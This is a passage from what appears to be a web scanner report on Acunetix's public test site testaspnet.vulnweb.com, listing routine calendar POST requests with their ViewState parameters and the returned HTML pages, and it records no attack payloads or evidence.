href="javascript:__doPostBack('RightPanel1$Calendar','8501')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8502')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8503')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8504')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8505')" style="color:Black" title="April 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8506')" style="color:Black" title="April 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8507')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8508')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8509')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8510')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8511')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8512')" style="color:Black" title="April 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8513')" style="color:Black" title="April 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8514')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8515')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8516')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8517')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8518')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8519')" style="color:Black" title="April 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1131 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,131 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8487&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgCAwF8fL9sIZGRkV20IbfJbgcpJz4fVA8Gtk5YI85o%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKnu%2FLaBgLTp%2BrACAK1zpjCCwK%2Fk8eMBAK%2Fk8eMBAK%2Fk%2FujDQK%2Fk%2FujDQK%2Fk%2B%2FGBgK%2Fk%2B%2FGBgK%2Fk8OvAwK%2Fk8OvAwK%2Fk%2FfCDAK%2Fk%2FfCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd%2BAkCkLqd%2BAkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ%2BKYDAtfZ%2BKYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg%2BoUNAqjg%2BoUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwctRsckdaXDphbGF%2BFy6nmQoC2xOA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:54:25 GMT Content-Length: 12481
Response Body - size: 12,481 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgCAwF8fL9sIZGRkV20IbfJbgcpJz4fVA8Gtk5YI85o=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKnu/LaBgLTp+rACAK1zpjCCwK/k8eMBAK/k8eMBAK/k/ujDQK/k/ujDQK/k+/GBgK/k+/GBgK/k8OvAwK/k8OvAwK/k/fCDAK/k/fCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd+AkCkLqd+AkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ+KYDAtfZ+KYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg+oUNAqjg+oUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwctRsckdaXDphbGF+Fy6nmQoC2xOA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:White" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8499')" style="color:Black" title="April 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8500')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8501')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8502')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8503')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8504')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8505')" style="color:Black" title="April 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8506')" style="color:Black" title="April 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8507')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8508')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8509')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8510')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8511')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8512')" style="color:Black" title="April 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8513')" style="color:Black" title="April 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8514')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8515')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8516')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8517')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8518')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8519')" style="color:Black" title="April 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1131 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,131 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8503&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgCAXAayO9sIZGRk7CIFUdilzOCuG0OBJ7Um2gmiHLk%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLm36L1DQLTp%2BrACAK1zpjCCwK%2Fk8eMBAK%2Fk8eMBAK%2Fk%2FujDQK%2Fk%2FujDQK%2Fk%2B%2FGBgK%2Fk%2B%2FGBgK%2Fk8OvAwK%2Fk8OvAwK%2Fk%2FfCDAK%2Fk%2FfCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd%2BAkCkLqd%2BAkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ%2BKYDAtfZ%2BKYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg%2BoUNAqjg%2BoUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwckEvITpRR4%2BQM%2BK7zyQHDyF0pq1w%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:39:45 GMT Content-Length: 12481
Response Body - size: 12,481 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgCAXAayO9sIZGRk7CIFUdilzOCuG0OBJ7Um2gmiHLk=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLm36L1DQLTp+rACAK1zpjCCwK/k8eMBAK/k8eMBAK/k/ujDQK/k/ujDQK/k+/GBgK/k+/GBgK/k8OvAwK/k8OvAwK/k/fCDAK/k/fCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd+AkCkLqd+AkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ+KYDAtfZ+KYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg+oUNAqjg+oUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwckEvITpRR4+QM+K7zyQHDyF0pq1w==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8499')" style="color:Black" title="April 09">9</a></td><td align="center" style="width:14%;"><a 